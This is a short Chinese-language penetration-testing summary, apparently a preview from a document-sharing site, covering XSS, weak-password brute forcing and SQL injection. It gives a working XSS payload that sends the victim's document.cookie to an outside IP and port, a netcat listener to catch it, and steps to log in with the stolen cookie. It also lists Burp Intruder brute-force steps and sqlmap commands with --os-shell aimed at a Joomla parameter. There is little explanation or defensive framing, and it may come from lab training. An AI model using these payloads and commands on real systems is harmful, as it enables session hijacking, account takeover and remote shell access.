渗透测试总结
合集下载
相关主题
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
XSS、SQL注入、文件上传、弱口令、备份信息泄露
XSS
●分析漏洞成因
●构造payload
document.body.appendChild(document.createElement('img')).setAtt ribute('src','http://172.16.11.2:8888/?='+document.cookie); >
●NetCat监听端口nc.exe -lnvp 8888
●利用cookie登录
●获取权限
弱口令
●Burpsuit拦截数据包
●Intruder模块
●标记密码
●加载字典
●开始爆破
●查看返回值
SQL注入
●抓包
●Decoder as url
●保存post请求
●Sqlmap.py sqlmap.py -r C:\Joomla.txt -p filter[category_id] ●SQLmap OS-shell
sqlmap.exe -r C:\Joomla.txt -p filter[category_id] --os-shell
●获取交互式shell